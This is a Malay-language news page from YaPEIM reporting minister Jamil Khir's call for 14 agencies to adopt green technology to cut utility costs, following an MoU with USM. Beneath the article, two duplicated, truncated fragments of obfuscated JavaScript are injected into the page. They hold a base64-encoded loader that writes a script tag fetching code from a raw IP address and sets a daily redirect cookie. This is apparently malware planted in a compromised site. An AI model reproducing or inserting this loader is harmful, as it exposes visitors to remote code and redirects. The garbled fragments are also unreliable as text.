YaPEIM » Laksanakan Teknologi Hijau Untuk Kurang Kos Utiliti – Jamil Khir

Terkini

Laksanakan Teknologi Hijau Untuk Kurang Kos Utiliti – Jamil Khir

Majlis dirasmikan oleh YB. Mejar Jeneral Dato’ Seri Jamil Khir Bin Hj Baharom di Grand Season Avenue Kuala Lumpur

KUALA LUMPUR, 24 FEBRUARI 2014 :  Menteri di Jabatan Perdana Menteri, Mejar Jeneral Dato’ Seri Jamil Khir bin Hj Baharom mahukan 14 agensi di bawah seliaanya memanfaatkan teknologi hijau, untuk mengurangkan kos operasi mereka.

Bercakap kepada pemberita selepas majlis menandatangani memorandum persefahaman (MoU) antara YaPEIM dan USM serta pelancaran zon hijau di pejabat YaPEIM di Grand Season Avenue di sini, beliau berkata:

“Dengan jangkaan penjimatan 40 peratus setahun tanpa memerlukan kos tambahan, langkah penggunaan teknologi hijau ini akan memberi impak positif kepada penjimatan penggunaan tenaga dengan mewujudkan budaya berjimat.

“Apabila bangunan Pusat Islam baru siap dibina pada Ogos 2014 di Putrajaya, yang akan menampatkan agensi-agensi di bawah seliaan saya, kita akan memanfaatkan sepenuhnya amalan teknologi hijau.”

Turut hadir dalam majlis berkenaan ialah Dato’ Abdul Malek Awang Kechil, Presiden dan Pengerusi Ahli Lembaga Pemegang Amanah YaPEIM; Datuk Hajah Zaleha Hussin, Timbalan Presiden yang juga Timbalan Pengerusi LPA YAPEIM; Prof Dato’ Dr Omar Osman, Naib Canselor Universiti Sains Malaysia (USM) dan En Abibullah Hj. Samsudin, Ketua Pengarah YaPEIM.

Jamil Khir berkata, institusi Islam boleh memain peranan dan menunjukkan contoh terbaik dari segi penjimatan kos utiliti, dan memanfaatkan penggunaan teknologi.

“Dengan cara ini umat Islam akan dilihat sebagai kumpulan yang patut dicontohi, seperti mana amalan kebersihan yang biasanya berlaku di negara-negara maju termasuk negara Jepun,” katanya.

Sementara itu, Abibullah berkata, YaPEIM dijangka dapat menjimatkan perbelanjaan kos utiliti sekitar 40 peratus setahun apabila dilaksanakan di 202 cawangan Ar-Rahnu di seluruh negara pada tahun 2014.

“YaPEIM dijangka dapat menjimatkan sehingga RM1.7 juta setahun atas program penjimatan dengan memanfaatkan teknologi hijau hasil kerjasama dengan USM.

“Melalui cara ini, dalam jangka panjang akan memberi manfaat besar kepada semua pelanggan-pelanggan dan ummah keseluruhan,” katanya.

([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”

(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”

Top

Comments are closed.

Top